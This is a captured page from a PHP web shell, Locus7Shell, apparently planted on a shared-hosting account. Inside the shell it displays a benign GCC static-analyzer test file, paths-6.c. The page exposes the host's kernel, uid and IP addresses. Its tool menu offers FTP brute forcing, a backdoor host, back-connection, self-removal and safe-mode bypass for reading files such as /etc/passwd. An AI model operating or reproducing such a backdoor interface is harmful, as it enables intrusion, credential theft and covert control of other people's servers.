Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/analyzer/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     paths-6.c (1.82 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#include <stdlib.h>
#include "analyzer-decls.h"

/* Verify that ordering of writes doesn't matter when merging states.  */

/* Test with locals.  */

void test_1 (int flag)
{
  int a, b;
  if (flag)
    {
      a = 3;
      b = 4;
    }
  else
    {
      b = 4;
      a = 3;
    }

  __analyzer_dump_exploded_nodes (0); /* { dg-warning "1 processed enode" } */
  __analyzer_eval (a == 3); /* { dg-warning "TRUE" } */
  __analyzer_eval (b == 4); /* { dg-warning "TRUE" } */
}

/* Test with globals.  */

int f, g, h;
void test_2 (int flag)
{
  if (flag)
    {
      f = 3;
      g = 4;
    }
  else
    {
      g = 4;
      f = 3;
    }

  __analyzer_dump_exploded_nodes (0); /* { dg-warning "1 processed enode" } */
  __analyzer_eval (f == 3); /* { dg-warning "TRUE" } */
  __analyzer_eval (g == 4); /* { dg-warning "TRUE" } */
}

/* All 6 orderings of writes to 3 globals.  */

void test_3 (int i)
{
  switch (i)
    {
    default:
    case 0:
      f = 3;
      g = 4;
      h = 5;
      break;

    case 1:
      f = 3;
      h = 5;
      g = 4;
      break;

    case 2:
      g = 4;
      f = 3;
      h = 5;
      break;

    case 3:
      g = 4;
      h = 5;
      f = 3;
      break;

    case 4:
      h = 5;
      f = 3;
      g = 4;
      break;

    case 5:
      h = 5;
      g = 4;
      f = 3;
      break;
    }

  __analyzer_dump_exploded_nodes (0); /* { dg-warning "1 processed enode" } */
  __analyzer_eval (f == 3); /* { dg-warning "TRUE" } */
  __analyzer_eval (g == 4); /* { dg-warning "TRUE" } */
  __analyzer_eval (h == 5); /* { dg-warning "TRUE" } */
}

void test_4 (int flag)
{
  void *p, *q;
  if (flag)
    {
      p = malloc (256);
      q = malloc (256);
    }
  else
    {
      q = malloc (256);
      p = malloc (256);
    }
  __analyzer_dump_exploded_nodes (0); /* { dg-warning "2 processed enode" } */
  free (p);
  free (q);
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0056 ]--